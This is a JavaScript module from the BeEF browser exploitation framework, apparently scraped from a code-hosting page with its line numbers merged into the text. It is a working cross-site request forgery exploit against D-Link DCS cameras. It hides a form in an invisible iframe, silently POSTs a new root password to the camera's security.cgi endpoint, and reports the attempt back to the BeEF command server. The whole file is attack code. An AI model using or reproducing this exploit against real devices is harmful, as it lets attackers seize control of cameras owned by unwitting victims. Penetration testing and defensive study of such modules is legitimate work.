Path: blob/master/modules/exploits/camera/dlink_dcs_series_csrf/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {7var base = '<%= @base %>';8var passwd = '<%= @password %>';910var dlink_dcs_iframe = beef.dom.createInvisibleIframe();1112var form = document.createElement('form');13form.setAttribute('action', base + "/setup/security.cgi");14form.setAttribute('method', 'post');1516var input = null;1718input = document.createElement('input');19input.setAttribute('type', 'hidden');20input.setAttribute('name', 'rootpass');21input.setAttribute('value', passwd);22form.appendChild(input);2324input = document.createElement('input');25input.setAttribute('type', 'hidden');26input.setAttribute('name', 'confirm');27input.setAttribute('value', passwd);28form.appendChild(input);2930dlink_dcs_iframe.contentWindow.document.body.appendChild(form);31form.submit();3233beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");3435cleanup = function() {36document.body.removeChild(dlink_dcs_iframe);37}38setTimeout("cleanup()", 15000);3940});41424344